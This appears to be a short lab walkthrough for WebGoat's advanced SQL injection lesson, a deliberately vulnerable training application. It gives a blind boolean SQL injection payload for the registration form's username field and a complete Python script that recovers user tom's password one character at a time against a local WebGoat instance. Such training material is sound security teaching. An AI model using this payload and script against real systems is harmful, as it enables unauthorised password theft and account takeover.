Brute-forcing the WebGoat password with Python code (blind SQL injection)
WebGoat / SQL Injection (advanced) - lesson 5
On the register page:
Username: tom' and substr(password,1,1)='a'--
Fill in the other fields with anything
substr() picks one character out of the stored password. Because the username is concatenated into the registration check, the injected condition decides the outcome: if it is true the server reports that user tom already exists, if it is false it does not. That difference is a boolean oracle that leaks the password one character at a time. Capture the request in Burp Suite and copy the JSESSIONID value.
Install the dependency:
pip install requests
The full script:
import requests

url = "http://127.0.0.1:8080/WebGoat/SqlInjectionAdvanced/challenge"

# Replace the JSESSIONID value with the one copied from Burp
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
    "Cookie": "JSESSIONID=NKNYPCSvpweUmfw3quP1ASFH8tNPQFKTPea_Ro28",
}

keylist = [chr(i) for i in range(33, 127)]  # digits, upper/lower-case letters and punctuation
answer = ''

for i in range(1, 24):
    for c in keylist:
        # Guess the password one position at a time with substring()
        payload = "tom' and substring(password," + str(i) + ",1)='" + c + "'-- ss"
        formdata = {
            "username_reg": payload,
            "email_reg": "123@123.com",
            "password_reg": "12",
            "confirm_password_reg": "12",
        }
        response = requests.put(url, data=formdata, headers=headers)
        # A correct guess makes the registration check answer that the user already exists
        if response.text.find("already exists") != -1:
            answer = answer + c
            print(answer)
            break
    else:
        # No candidate matched at this position: the end of the password was reached
        # (or the session cookie is no longer valid), so stop instead of skipping the position
        break